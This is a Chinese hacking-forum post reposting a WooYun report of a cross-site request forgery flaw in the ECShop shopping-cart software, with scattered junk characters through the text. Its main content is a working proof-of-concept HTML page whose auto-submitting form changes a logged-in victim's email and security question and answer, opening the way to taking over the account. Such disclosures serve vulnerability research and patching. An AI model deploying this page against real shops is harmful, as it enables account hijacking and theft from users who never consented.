找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2085|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:) |2 m8 i: F) u3 O5 q  P3 P
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
4 t8 }8 O9 p: @- F6 e; b, E4 f% h0 A  F) B! J
Demo For:http://www.wooyun.org/bug.php?action=view&id=395; ~- _* G; o* }5 o& G" ~

; C9 F. f3 m& E0 E. G! A5 E# {9 C详细说明:
2 W# u& a' B9 z利用csrf和xss可以突破官方所说的“障碍”8 A, @# h5 K8 B/ F" {5 `9 a$ u
xss版本已经有人说明
1 p# K( D0 D5 c* Z这里给出csrf版本+ K& E6 a' @8 N  i
; Y/ j; t1 H2 l$ w: d; f# [
漏洞证明:% w/ f% ?% [' R. C- y+ f
<html>; a- a  v3 a5 c* a
<body># f, g" p+ Q- {- ?7 X, F( {
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
3 S) V, d  y8 v. a/ Z# F' W<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) |: t6 `, m4 g: k) `
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
0 w* k* h( z/ J3 M& `4 Z$ H/ H$ }<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 i! i6 W# e' Y; @% L& d- L- T" C
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
- d, R" W5 s3 X, G# b7 o+ ^</body>
& q3 f( l4 K" o7 e* h& }+ I" M<script>
, ]0 }! j( G  B6 ]document.forms[0].submit();( ?2 i, ?8 D9 o8 O
</script>/ r2 s* ^/ q6 I3 y6 V! ^7 `5 F
</html>
- l7 [: T: B! L; c3 m  _构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
. ^6 \; }+ l/ j3 V* R& F6 i
  ~/ G! O3 c' k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表